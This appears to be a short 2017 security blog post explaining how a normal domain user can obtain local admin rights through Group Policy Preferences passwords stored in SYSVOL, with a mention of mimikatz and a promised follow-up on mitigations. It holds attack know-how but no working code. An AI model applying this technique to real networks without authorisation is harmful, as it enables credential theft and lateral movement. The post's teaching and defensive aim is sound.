Ready to Start Your Career?
March 30, 2017
Lateral Movement Part 1
March 30, 2017
Scenario: you are a normal user in your company’s domain. No admin privileges. Nothing. You can’t even install a program on your machine.What if I told you, that you can be the local administrator on your machine and
probably on several more in your organization?I am not able to count the number of things you are able to do as a local admin (evil / non-evil) :-)…for this post am going to demonstrate how to simply move from a normal user and gain local admin privileges. This is an attack vector I have been using in various security assessments I have been doing. Time to let the cat out of the bag…haha.What are Global Policy Preferences Passwords?In a nutshell, sys admins have 100 plus machines on a domain and want to configure all the machines, chances are they are bound to use the same local admin password to install programs and configure the machines in the domain. They use the GPO to do this; hence the use of the Global Policy Preference Password to conveniently push the same password to all hosts in the domain. Convenience at the expense of security – how many times do we see that?Ways to find the GPPP password?To be honest, countless. But I shall show some few here. chances are that it is used on most if not all machines in the domain! Think about the lateral movement that is possible, the dumping of passwords – mimikatz, anyone?That doesn’t so good for the blue teamers, right? In the next post we are going to see practical ways to mitigate this.Remember this is not a new attack vector, the reason I am putting this up is because in all penetration testing assessments I have been doing, this has been a recurring vulnerability.https://the-infosec.com/2017/03/26/lateral-movement-part-i/
- Manually traversing to \<domain name>SYSVOL<domain name>Policies